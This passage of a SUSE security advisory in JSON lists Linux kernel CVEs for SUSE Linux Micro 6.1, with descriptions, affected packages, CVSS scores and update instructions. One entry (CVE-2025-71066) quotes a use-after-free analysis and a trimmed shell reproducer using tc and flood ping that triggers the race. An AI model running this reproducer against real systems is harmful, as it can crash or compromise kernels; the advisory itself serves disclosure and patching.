"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()\n\nrlen value is a user-controlled value, but dtv5100_i2c_msg() does not\ncheck the size of the rlen value. Therefore, if it is set to a value\nlarger than sizeof(st-\u003edata), an out-of-bounds vuln occurs for st-\u003edata.\n\nTherefore, we need to add proper range checking to prevent this vuln.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68819",
"url": "https://www.suse.com/security/cve/CVE-2025-68819"
},
{
"category": "external",
"summary": "SUSE Bug 1256664 for CVE-2025-68819",
"url": "https://bugzilla.suse.com/1256664"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68819"
},
{
"cve": "CVE-2025-68820",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68820"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: xattr: fix null pointer deref in ext4_raw_inode()\n\nIf ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),\niloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()\nlacks error checking, this will lead to a null pointer dereference\nin ext4_raw_inode(), called right after ext4_get_inode_loc().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68820",
"url": "https://www.suse.com/security/cve/CVE-2025-68820"
},
{
"category": "external",
"summary": "SUSE Bug 1256754 for CVE-2025-68820",
"url": "https://bugzilla.suse.com/1256754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68820"
},
{
"cve": "CVE-2025-71064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: using the num_tqps in the vf driver to apply for resources\n\nCurrently, hdev-\u003ehtqp is allocated using hdev-\u003enum_tqps, and kinfo-\u003etqp\nis allocated using kinfo-\u003enum_tqps. However, kinfo-\u003enum_tqps is set to\nmin(new_tqps, hdev-\u003enum_tqps); Therefore, kinfo-\u003enum_tqps may be smaller\nthan hdev-\u003enum_tqps, which causes some hdev-\u003ehtqp[i] to remain\nuninitialized in hclgevf_knic_setup().\n\nThus, this patch allocates hdev-\u003ehtqp and kinfo-\u003etqp using hdev-\u003enum_tqps,\nensuring that the lengths of hdev-\u003ehtqp and kinfo-\u003etqp are consistent\nand that all elements are properly initialized.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71064",
"url": "https://www.suse.com/security/cve/CVE-2025-71064"
},
{
"category": "external",
"summary": "SUSE Bug 1256654 for CVE-2025-71064",
"url": "https://bugzilla.suse.com/1256654"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71064"
},
{
"cve": "CVE-2025-71066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71066",
"url": "https://www.suse.com/security/cve/CVE-2025-71066"
},
{
"category": "external",
"summary": "SUSE Bug 1256645 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "external",
"summary": "SUSE Bug 1258005 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1258005"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71077",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71077"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: Cap the number of PCR banks\n\ntpm2_get_pcr_allocation() does not cap any upper limit for the number of\nbanks. Cap the limit to eight banks so that out of bounds values coming\nfrom external I/O cause on only limited harm.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71077",
"url": "https://www.suse.com/security/cve/CVE-2025-71077"
},
{
"category": "external",
"summary": "SUSE Bug 1256613 for CVE-2025-71077",
"url": "https://bugzilla.suse.com/1256613"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
